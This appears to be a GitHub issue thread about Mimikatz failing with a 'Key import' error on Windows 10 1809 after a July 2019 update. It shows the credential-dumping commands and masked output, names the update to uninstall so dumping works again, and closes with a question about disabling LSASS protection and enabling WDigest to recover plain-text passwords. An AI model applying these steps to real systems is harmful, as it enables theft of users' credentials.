Mimikatz error on Windows version 1809 (Build 17763.615)

[GKNSB]

We identified that on a fully updated Windows 10 1809, both the latest versions of Mimikatz (2.2.0 20190710 and 2.2.0 20190512) appear to fail when attempting to extract credentials, with error message ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

Note that the aforementioned versions of Mimikatz work normally on Windows 10 1903 as expected.

The issue persists if we attempt to extract through minidump as well. Please see the attached screenshots in case they assist.

Let us know if you need any further assistance or information.

[rubinatorz]

Same here on Windows 10, version 1809 (Build 17763.615):

  .#####.   mimikatz 2.2.0 (x64) #18362 Jul 10 2019 23:09:43
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

\mimikatz 2.2.0\x64>mimikatz.exe

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

Last Wednesday July 10th before the latest update it worked all well:

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 93009 (00000000:00016b51)
Session           : Interactive from 1
User Name         : tester
Domain            : DESKTOP-XXX
Logon Server      : DESKTOP-XXX
Logon Time        : 9-7-2019 11:02:48
SID               : ***
    msv :   
     [00000003] Primary
     * Username : tester
     * Domain   : DESKTOP-XXX
     * NTLM     : ***
     * SHA1     : ***
    tspkg : 
    wdigest :   
     * Username : tester
     * Domain   : DESKTOP-XXX
     * Password : ***
    kerberos :  
     * Username : tester
     * Domain   : DESKTOP-XXX
     * Password : (null)
    ssp :   
    credman :
...

And after July 10th update I'm getting the "Key Import" error.

[Papotito123]

Hi: A kb45xxx69 is a NET update for Win 10 1809/Server 2019 That's the culprit.Is trying to resolve issues of SAML leaking info.I uninstalled and mimi works good again.

[GKNSB]

Thanks for the clarification @Papotito123 Hopefully kiwi will have a look into it soon.

[Papotito123]

Hi: I hope so.

[Papotito123]

Hello: Yes.mimikatz PSCredential version seems to deal with the Private key issue. mimikatz SR98 still gives Private key error because after uninstalling kb45xxx69(that uninstalled kb45xxx19 at same time),Windows Upadates re-installed kb45xxx619.This is the real culprit.But mimikatz PSCredential works good. Thanks for sharing

[Papotito123]

Hello: My Win 10 1809 x64 computer is a simple standalone and not in Domain or Share. I run mimikatz driver, /remove lsass exe protection but can't grab pain-text password except if I activate WDIGEST in registry.Or by using rundll32 mimikatz dll trick.But both requires a logout and login.Dumb question.There's a way to grab the password by just. running mimikatz?.I ask because sometimes I got the feeling that some guys talking about grabbing plain-text password like if it was just by running mimikatz by itself and without further modifications.I'm just asking. Thanks.